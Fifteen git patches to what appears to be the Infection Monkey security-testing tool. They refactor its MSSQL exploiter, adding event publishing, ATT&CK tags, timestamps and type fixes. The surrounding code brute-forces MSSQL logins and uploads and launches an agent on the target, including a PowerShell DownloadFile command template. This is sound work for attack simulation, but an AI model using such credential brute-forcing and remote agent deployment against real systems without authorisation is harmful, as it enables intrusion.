From 8dd196122b0974f52e5d3f06b4960cf9500b8795 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 14:46:35 +0000 Subject: [PATCH 01/15] Agent: Publish events from MSSQLExploiter --- monkey/infection_monkey/exploit/mssqlexec.py | 23 ++++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index a2a63eec8..fde399d10 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,7 +1,7 @@ import logging from pathlib import PureWindowsPath from time import sleep -from typing import Sequence, Tuple +from typing import Iterable, Tuple import pymssql @@ -42,7 +42,7 @@ class MSSQLExploiter(HostExploiter): self.agent_http_path = None def _exploit_host(self) -> ExploiterResultData: - agent_path_on_victim = get_agent_dst_path(self.host) + agent_path_on_victim = PureWindowsPath(get_agent_dst_path(self.host)) # Brute force to get connection creds = generate_identity_secret_pairs( @@ -72,15 +72,17 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) + self.publish_propagation_event(self.host.ip_addr, False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result + self.publish_propagation_event(self.host.ip_addr, True) self.exploit_result.propagation_success = True return self.exploit_result def _brute_force( - self, host: str, port: str, users_passwords_pairs_list: Sequence[Tuple[str, str]] + self, host: str, port: str, users_passwords_pairs_list: Iterable[Tuple[str, str]] ) -> pymssql.Cursor: """ Starts the brute force connection attempts and if needed then init the payload process. @@ -122,12 +124,13 @@ class MSSQLExploiter(HostExploiter): ) self.exploit_result.exploitation_success = True self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) - self.report_login_attempt(True, user, password) + self._report_login_attempt(True, host, user, password) cursor = conn.cursor() return cursor except pymssql.OperationalError as err: - logger.info(f"Connection to MSSQL failed: {err}") - self.report_login_attempt(False, user, password) + error_message = f"Connection to MSSQL failed: {err}" + logger.info(error_message) + self._report_login_attempt(False, host, user, password, error_message) # Combo didn't work, hopping to the next one pass @@ -139,6 +142,12 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) + def _report_login_attempt( + self, success: bool, host: str, user, password: str, message: str = "" + ): + self.publish_exploitation_event(host, success, error_message=message) + self.report_login_attempt(success, user, password) + def _upload_agent(self, agent_path_on_victim: PureWindowsPath): http_thread = self._start_agent_server(agent_path_on_victim) @@ -179,7 +188,7 @@ class MSSQLExploiter(HostExploiter): def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str: agent_args = build_monkey_commandline( - self.servers, self.current_depth + 1, agent_path_on_victim + self.servers, self.current_depth + 1, str(agent_path_on_victim) ) return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}" From 2cd9d0086bdd03661838e32f201bfccca0262ef8 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 15:21:46 +0000 Subject: [PATCH 02/15] Agent: Fix mypy error in http_tools.py --- monkey/infection_monkey/exploit/tools/http_tools.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index a24fb909e..70adf3d7b 100644 --- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -3,6 +3,7 @@ import urllib.error import urllib.parse import urllib.request from threading import Lock +from typing import Optional, Tuple from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import get_free_tcp_port @@ -28,7 +29,7 @@ class HTTPTools(object): @staticmethod def create_locked_transfer( host, dropper_target_path, agent_binary_repository, local_ip=None, local_port=None - ) -> LockedHTTPServer: + ) -> Tuple[Optional[str], Optional[LockedHTTPServer]]: """ Create http server for file transfer with a lock :param host: Variable with target's information From 33230e85f75bce9c8fa6197c99a70b8e3f66e7d5 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 12:51:59 +0000 Subject: [PATCH 03/15] Agent: Use updated publish methods --- monkey/infection_monkey/exploit/mssqlexec.py | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index fde399d10..6b4de1fc2 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -52,10 +52,12 @@ class MSSQLExploiter(HostExploiter): try: self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds) except FailedExploitationError: - logger.info( + error_message = ( f"Failed brute-forcing of MSSQL server on {self.host}," f" no credentials were successful" ) + logger.error(error_message) + self._publish_exploitation_event(self.host.ip_addr, False, error_message=error_message) return self.exploit_result if self._is_interrupted(): @@ -72,12 +74,12 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self.publish_propagation_event(self.host.ip_addr, False, error_message=error_message) + self._publish_propagation_event(self.host.ip_addr, False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result - self.publish_propagation_event(self.host.ip_addr, True) + self._publish_propagation_event(self.host.ip_addr, True) self.exploit_result.propagation_success = True return self.exploit_result @@ -145,7 +147,7 @@ class MSSQLExploiter(HostExploiter): def _report_login_attempt( self, success: bool, host: str, user, password: str, message: str = "" ): - self.publish_exploitation_event(host, success, error_message=message) + self._publish_exploitation_event(host, success, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From 183bd1145faa46ed3002ed67d37ee70b8beaa8d1 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:07:28 +0000 Subject: [PATCH 04/15] Agent: Add tags to MSSQL exploitation events --- monkey/infection_monkey/exploit/mssqlexec.py | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 6b4de1fc2..f3bda8d52 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -7,6 +7,10 @@ import pymssql from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.credentials import get_plaintext +from common.tags import ( + T1110_ATTACK_TECHNIQUE_TAG, + T1210_ATTACK_TECHNIQUE_TAG, +) from common.utils.exceptions import FailedExploitationError from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.tools.helpers import get_agent_dst_path @@ -20,6 +24,9 @@ from infection_monkey.utils.threading import interruptible_iter logger = logging.getLogger(__name__) +MSSQL_EXPLOITER_TAG = "mssql-exploiter" +EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + class MSSQLExploiter(HostExploiter): _EXPLOITED_SERVICE = "MSSQL" @@ -57,7 +64,9 @@ class MSSQLExploiter(HostExploiter): f" no credentials were successful" ) logger.error(error_message) - self._publish_exploitation_event(self.host.ip_addr, False, error_message=error_message) + self._publish_exploitation_event( + self.host.ip_addr, False, EXPLOITER_TAGS, error_message + ) return self.exploit_result if self._is_interrupted(): @@ -147,7 +156,7 @@ class MSSQLExploiter(HostExploiter): def _report_login_attempt( self, success: bool, host: str, user, password: str, message: str = "" ): - self._publish_exploitation_event(host, success, error_message=message) + self._publish_exploitation_event(host, success, EXPLOITER_TAGS, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From fa8b721abef404443f1bff93a60f197d06ccf5c8 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:23:13 +0000 Subject: [PATCH 05/15] Common: Add attack technique T1059 --- monkey/common/tags/__init__.py | 1 + monkey/common/tags/attack.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/common/tags/__init__.py b/monkey/common/tags/__init__.py index ea08aa9f5..fb30c71df 100644 --- a/monkey/common/tags/__init__.py +++ b/monkey/common/tags/__init__.py @@ -2,6 +2,7 @@ from .attack import ( T1003_ATTACK_TECHNIQUE_TAG, T1005_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG, + T1059_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, diff --git a/monkey/common/tags/attack.py b/monkey/common/tags/attack.py index e8881dfa7..5c3a8d117 100644 --- a/monkey/common/tags/attack.py +++ b/monkey/common/tags/attack.py @@ -1,6 +1,7 @@ T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003" T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005" T1021_ATTACK_TECHNIQUE_TAG = "attack-t1021" +T1059_ATTACK_TECHNIQUE_TAG = "attack-t1059" T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098" T1105_ATTACK_TECHNIQUE_TAG = "attack-t1105" T1110_ATTACK_TECHNIQUE_TAG = "attack-t1110" From aab965bad7a2d532257437195de1302188c6115d Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:28:08 +0000 Subject: [PATCH 06/15] Common: Add attack technique T1071 --- monkey/common/tags/__init__.py | 1 + monkey/common/tags/attack.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/common/tags/__init__.py b/monkey/common/tags/__init__.py index fb30c71df..e8b6842e3 100644 --- a/monkey/common/tags/__init__.py +++ b/monkey/common/tags/__init__.py @@ -3,6 +3,7 @@ from .attack import ( T1005_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1059_ATTACK_TECHNIQUE_TAG, + T1071_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, diff --git a/monkey/common/tags/attack.py b/monkey/common/tags/attack.py index 5c3a8d117..8bb748754 100644 --- a/monkey/common/tags/attack.py +++ b/monkey/common/tags/attack.py @@ -2,6 +2,7 @@ T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003" T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005" T1021_ATTACK_TECHNIQUE_TAG = "attack-t1021" T1059_ATTACK_TECHNIQUE_TAG = "attack-t1059" +T1071_ATTACK_TECHNIQUE_TAG = "attack-t1071" T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098" T1105_ATTACK_TECHNIQUE_TAG = "attack-t1105" T1110_ATTACK_TECHNIQUE_TAG = "attack-t1110" From 8317c03686f48e67cf3a4d74b58ba2796f318d9d Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:29:03 +0000 Subject: [PATCH 07/15] Agent: Add tags to MSSQL propagation events --- monkey/infection_monkey/exploit/mssqlexec.py | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index f3bda8d52..231a09fc2 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -8,6 +8,9 @@ import pymssql from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.credentials import get_plaintext from common.tags import ( + T1059_ATTACK_TECHNIQUE_TAG, + T1071_ATTACK_TECHNIQUE_TAG, + T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG, ) @@ -26,6 +29,12 @@ logger = logging.getLogger(__name__) MSSQL_EXPLOITER_TAG = "mssql-exploiter" EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) +PROPAGATION_TAGS = ( + MSSQL_EXPLOITER_TAG, + T1059_ATTACK_TECHNIQUE_TAG, + T1071_ATTACK_TECHNIQUE_TAG, + T1105_ATTACK_TECHNIQUE_TAG, +) class MSSQLExploiter(HostExploiter): @@ -83,12 +92,14 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self._publish_propagation_event(self.host.ip_addr, False, error_message=error_message) + self._publish_propagation_event( + self.host.ip_addr, False, PROPAGATION_TAGS, error_message + ) self.exploit_result.error_message = error_message return self.exploit_result - self._publish_propagation_event(self.host.ip_addr, True) + self._publish_propagation_event(self.host.ip_addr, True, PROPAGATION_TAGS) self.exploit_result.propagation_success = True return self.exploit_result From 9269c8579cd387959e812dd51c4d3f3f841ee54b Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:35:34 +0000 Subject: [PATCH 08/15] Agent: Remove unneccessary technique --- monkey/infection_monkey/exploit/mssqlexec.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 231a09fc2..cc93f084c 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -9,7 +9,6 @@ from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.credentials import get_plaintext from common.tags import ( T1059_ATTACK_TECHNIQUE_TAG, - T1071_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG, @@ -32,7 +31,6 @@ EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_ PROPAGATION_TAGS = ( MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, - T1071_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, ) From 5c6b1e3910124d9f0ba6cd7f6deedabe03844402 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:36:07 +0000 Subject: [PATCH 09/15] Common: Remove unused technique T1071 --- monkey/common/tags/__init__.py | 1 - monkey/common/tags/attack.py | 1 - 2 files changed, 2 deletions(-) diff --git a/monkey/common/tags/__init__.py b/monkey/common/tags/__init__.py index e8b6842e3..fb30c71df 100644 --- a/monkey/common/tags/__init__.py +++ b/monkey/common/tags/__init__.py @@ -3,7 +3,6 @@ from .attack import ( T1005_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1059_ATTACK_TECHNIQUE_TAG, - T1071_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, diff --git a/monkey/common/tags/attack.py b/monkey/common/tags/attack.py index 8bb748754..5c3a8d117 100644 --- a/monkey/common/tags/attack.py +++ b/monkey/common/tags/attack.py @@ -2,7 +2,6 @@ T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003" T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005" T1021_ATTACK_TECHNIQUE_TAG = "attack-t1021" T1059_ATTACK_TECHNIQUE_TAG = "attack-t1059" -T1071_ATTACK_TECHNIQUE_TAG = "attack-t1071" T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098" T1105_ATTACK_TECHNIQUE_TAG = "attack-t1105" T1110_ATTACK_TECHNIQUE_TAG = "attack-t1110" From e4044163638b2e239a3d105645885e59d6592a37 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:41:47 +0000 Subject: [PATCH 10/15] Agent: Use exploit tag properties --- monkey/infection_monkey/exploit/mssqlexec.py | 32 ++++++++------------ 1 file changed, 13 insertions(+), 19 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index cc93f084c..34a272bfc 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -27,12 +27,6 @@ from infection_monkey.utils.threading import interruptible_iter logger = logging.getLogger(__name__) MSSQL_EXPLOITER_TAG = "mssql-exploiter" -EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) -PROPAGATION_TAGS = ( - MSSQL_EXPLOITER_TAG, - T1059_ATTACK_TECHNIQUE_TAG, - T1105_ATTACK_TECHNIQUE_TAG, -) class MSSQLExploiter(HostExploiter): @@ -50,6 +44,12 @@ class MSSQLExploiter(HostExploiter): "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" ) + def _exploiter_tags(self) -> Tuple[str, ...]: + return (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + + def _propagation_tags(self) -> Tuple[str, ...]: + return (MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG) + def __init__(self): super().__init__() self.cursor = None @@ -71,9 +71,7 @@ class MSSQLExploiter(HostExploiter): f" no credentials were successful" ) logger.error(error_message) - self._publish_exploitation_event( - self.host.ip_addr, False, EXPLOITER_TAGS, error_message - ) + self._publish_exploitation_event(False, error_message=error_message) return self.exploit_result if self._is_interrupted(): @@ -90,14 +88,12 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self._publish_propagation_event( - self.host.ip_addr, False, PROPAGATION_TAGS, error_message - ) + self._publish_propagation_event(success=False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result - self._publish_propagation_event(self.host.ip_addr, True, PROPAGATION_TAGS) + self._publish_propagation_event(success=True) self.exploit_result.propagation_success = True return self.exploit_result @@ -144,13 +140,13 @@ class MSSQLExploiter(HostExploiter): ) self.exploit_result.exploitation_success = True self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) - self._report_login_attempt(True, host, user, password) + self._report_login_attempt(True, user, password) cursor = conn.cursor() return cursor except pymssql.OperationalError as err: error_message = f"Connection to MSSQL failed: {err}" logger.info(error_message) - self._report_login_attempt(False, host, user, password, error_message) + self._report_login_attempt(False, user, password, error_message) # Combo didn't work, hopping to the next one pass @@ -162,10 +158,8 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) - def _report_login_attempt( - self, success: bool, host: str, user, password: str, message: str = "" - ): - self._publish_exploitation_event(host, success, EXPLOITER_TAGS, error_message=message) + def _report_login_attempt(self, success: bool, user, password: str, message: str = ""): + self._publish_exploitation_event(success=success, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From 66f8471f24510995f63876f471495a85c205a288 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:46:29 +0000 Subject: [PATCH 11/15] Agent: Remove "summary" event --- monkey/infection_monkey/exploit/mssqlexec.py | 1 - 1 file changed, 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 34a272bfc..a3e0e7fd9 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -71,7 +71,6 @@ class MSSQLExploiter(HostExploiter): f" no credentials were successful" ) logger.error(error_message) - self._publish_exploitation_event(False, error_message=error_message) return self.exploit_result if self._is_interrupted(): From 15974ff21cd7fc6297ca0c7da3bac0851f9223e1 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:49:08 +0000 Subject: [PATCH 12/15] Agent: Stamp time before running exploit --- monkey/infection_monkey/exploit/mssqlexec.py | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index a3e0e7fd9..380d88425 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,6 +1,6 @@ import logging from pathlib import PureWindowsPath -from time import sleep +from time import sleep, time from typing import Iterable, Tuple import pymssql @@ -77,6 +77,7 @@ class MSSQLExploiter(HostExploiter): self._set_interrupted() return self.exploit_result + timestamp = time() try: self._upload_agent(agent_path_on_victim) self._run_agent(agent_path_on_victim) @@ -87,12 +88,12 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self._publish_propagation_event(success=False, error_message=error_message) + self._publish_propagation_event(timestamp, False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result - self._publish_propagation_event(success=True) + self._publish_propagation_event(timestamp, True) self.exploit_result.propagation_success = True return self.exploit_result @@ -123,6 +124,7 @@ class MSSQLExploiter(HostExploiter): ) for user, password in credentials_iterator: + timestamp = time() try: # Core steps # Trying to connect @@ -139,13 +141,13 @@ class MSSQLExploiter(HostExploiter): ) self.exploit_result.exploitation_success = True self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) - self._report_login_attempt(True, user, password) + self._report_login_attempt(timestamp, True, user, password) cursor = conn.cursor() return cursor except pymssql.OperationalError as err: error_message = f"Connection to MSSQL failed: {err}" logger.info(error_message) - self._report_login_attempt(False, user, password, error_message) + self._report_login_attempt(timestamp, False, user, password, error_message) # Combo didn't work, hopping to the next one pass @@ -157,8 +159,10 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) - def _report_login_attempt(self, success: bool, user, password: str, message: str = ""): - self._publish_exploitation_event(success=success, error_message=message) + def _report_login_attempt( + self, timestamp: float, success: bool, user, password: str, message: str = "" + ): + self._publish_exploitation_event(timestamp, success, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From 47846628e6d1a53c4f49e309eedd30a8ac416495 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:47:11 +0200 Subject: [PATCH 13/15] Agent: Modify MSSQL tags to be properties --- monkey/infection_monkey/exploit/mssqlexec.py | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 380d88425..802060136 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -44,11 +44,12 @@ class MSSQLExploiter(HostExploiter): "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" ) - def _exploiter_tags(self) -> Tuple[str, ...]: - return (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) - - def _propagation_tags(self) -> Tuple[str, ...]: - return (MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG) + _EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + _PROPAGATION_TAGS = ( + MSSQL_EXPLOITER_TAG, + T1059_ATTACK_TECHNIQUE_TAG, + T1105_ATTACK_TECHNIQUE_TAG, + ) def __init__(self): super().__init__() From ec617df06ad5aac4e04cb079680cda609aaa0ab4 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:53:17 +0200 Subject: [PATCH 14/15] Agent: Fix LocketHTTPServer mypy error in MSSQLExploiter --- monkey/infection_monkey/exploit/mssqlexec.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 802060136..72a250983 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,7 +1,7 @@ import logging from pathlib import PureWindowsPath from time import sleep, time -from typing import Iterable, Tuple +from typing import Iterable, Optional, Tuple import pymssql @@ -171,9 +171,12 @@ class MSSQLExploiter(HostExploiter): self._run_agent_download_command(agent_path_on_victim) - MSSQLExploiter._stop_agent_server(http_thread) + if http_thread: + MSSQLExploiter._stop_agent_server(http_thread) - def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer: + def _start_agent_server( + self, agent_path_on_victim: PureWindowsPath + ) -> Optional[LockedHTTPServer]: self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(agent_path_on_victim), self.agent_binary_repository ) From a558948c5d0ca7093a7af34ff0be0709d783a0cd Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Fri, 7 Oct 2022 08:43:05 -0400 Subject: [PATCH 15/15] Agent: Remove unnecessary `pass` from MSSQLExploiter --- monkey/infection_monkey/exploit/mssqlexec.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 72a250983..a6f8fd5ce 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -144,13 +144,12 @@ class MSSQLExploiter(HostExploiter): self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) self._report_login_attempt(timestamp, True, user, password) cursor = conn.cursor() + return cursor except pymssql.OperationalError as err: error_message = f"Connection to MSSQL failed: {err}" logger.info(error_message) self._report_login_attempt(timestamp, False, user, password, error_message) - # Combo didn't work, hopping to the next one - pass logger.warning( "No user/password combo was able to connect to host: {0}:{1}, "